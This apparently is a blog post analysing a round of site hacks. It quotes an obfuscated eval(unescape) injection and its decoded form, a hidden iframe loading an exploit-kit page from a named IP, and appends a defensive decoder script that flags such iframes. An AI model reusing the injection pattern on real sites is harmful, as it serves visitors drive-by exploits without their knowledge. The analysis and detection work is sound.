The latest batch of hacked sites may have a DNS hack as well; I'm not sure that's the case, but Alex seems to think it is.
All these sites have the following Whois Name Server entries:
Name Server: NS1.IPOWERDNS.COM
Name Server: NS1.IPOWERWEB.NET
Sure looks like iPowerWeb, right?
But the reverse DNS all goes to IPs on *.static.eigbox.net, which links to BIZLAND.
Here's a sample of the JavaScript in this round of site hacking:
eval(unescape("%77%69%6e%64%6f%77%2e%73%74...."));
Don't go to the link below if you know what's good for you, it's not safe.
The JavaScript above, when decoded, is the following:
window.status='Done';document.write('<iframe name=f2f8f656791 src=\'http:// 58.65.232.*/gpack/index.php?'+Math.round(Math.random()*74880)+'2\' width=480 height=156 style=\'display: none\'></iframe>')
You guessed it, bad things happen at 58.65.232.33, which APNIC claims to be hostfresh.com out of Hong Kong, which has a San Francisco mailbox according to their website.
Can someone explain why this exploit site still exists if these guys are doing business with a US address and all hell isn't raining down on their parade?
I don't get it, the web has gone mad...
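For anyone cleaning up one of these sites, here is an added example (my own code, not something from the original post or from any of the hosts named in it) that decodes an eval(unescape("...")) wrapper of the kind quoted above without ever running it, then flags the hidden iframe the decoded script writes. The injected sample is constructed inside the script to mirror the decoded payload's shape; its host is 192.0.2.10, an RFC 5737 documentation address, not the address from the post, and the helper toPercentEscapes exists only to build that sample.

```javascript
// Added example, not code from the original post: statically decode an
// eval(unescape("...")) wrapper and report hidden iframes in the result.
// Nothing here executes the decoded script.

// Percent-encode every character as %XX (or %uXXXX above 0xFF), the same
// shape legacy escape() produces. Used only to construct the sample below.
function toPercentEscapes(text) {
  return Array.from(text, (ch) => {
    const code = ch.charCodeAt(0);
    return code < 256
      ? '%' + code.toString(16).padStart(2, '0')
      : '%u' + code.toString(16).padStart(4, '0');
  }).join('');
}

// Decode like JavaScript's legacy unescape(): %XX and %uXXXX escapes are
// replaced; anything else, including malformed escapes, passes through.
function decodeUnescape(encoded) {
  return encoded.replace(/%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})/g,
    (match, u4, x2) => String.fromCharCode(parseInt(u4 !== undefined ? u4 : x2, 16)));
}

// Pull every string literal wrapped as eval(unescape("...")) out of page source.
function extractEvalUnescapePayloads(html) {
  const re = /eval\s*\(\s*unescape\s*\(\s*["']([^"']*)["']\s*\)\s*\)/g;
  const payloads = [];
  let m;
  while ((m = re.exec(html)) !== null) payloads.push(m[1]);
  return payloads;
}

// Find <iframe> tags in decoded script text and mark the ones that are hidden
// (display:none, visibility:hidden, or a zero width/height). The src host is
// pulled out even when the URL is built by string concatenation, and a space
// after "http://" (a defanged URL) is tolerated.
function findHiddenIframes(decodedJs) {
  const findings = [];
  const tagRe = /<iframe\b[^>]*>/gi;
  let m;
  while ((m = tagRe.exec(decodedJs)) !== null) {
    const tag = m[0];
    const hidden = /display\s*:\s*none/i.test(tag) ||
      /visibility\s*:\s*hidden/i.test(tag) ||
      /\b(?:width|height)\s*=\s*\\?["']?0\b/i.test(tag);
    const hostMatch = /https?:\/\/\s*([A-Za-z0-9.\-*]+)/i.exec(tag);
    findings.push({ tag, hidden, host: hostMatch ? hostMatch[1] : null });
  }
  return findings;
}

// Decode each wrapped payload on a page and attach the iframe findings.
function analyzePage(html) {
  return extractEvalUnescapePayloads(html).map((payload) => {
    const decoded = decodeUnescape(payload);
    return { decoded, iframes: findHiddenIframes(decoded) };
  });
}

// Constructed injected script, shaped like the decoded payload quoted in the
// post but pointing at a documentation-range host (192.0.2.10).
const INJECTED_JS =
  "window.status='Done';document.write('<iframe name=f2f8f656791 " +
  "src=\\'http://192.0.2.10/index.php?'+Math.round(Math.random()*74880)+'2\\' " +
  "width=480 height=156 style=\\'display: none\\'></iframe>')";

// Constructed page source carrying that script inside an eval(unescape()) wrapper.
const SAMPLE_HTML =
  '<html><body><h1>Site</h1>\n' +
  '<script>eval(unescape("' + toPercentEscapes(INJECTED_JS) + '"));</script>\n' +
  '</body></html>';

// Constructed clean page for comparison.
const BENIGN_HTML = '<html><body><script>var x = 1;</script></body></html>';

for (const result of analyzePage(SAMPLE_HTML)) {
  console.log('decoded:', result.decoded);
  for (const f of result.iframes) {
    console.log((f.hidden ? 'HIDDEN iframe -> ' : 'iframe -> ') + f.host);
  }
}
```

Run it with node and it prints the decoded document.write line followed by "HIDDEN iframe -> 192.0.2.10". Pointing analyzePage at the saved source of a compromised page gives you the injected host and the exact iframe text to grep for across the rest of the site, without touching the exploit server.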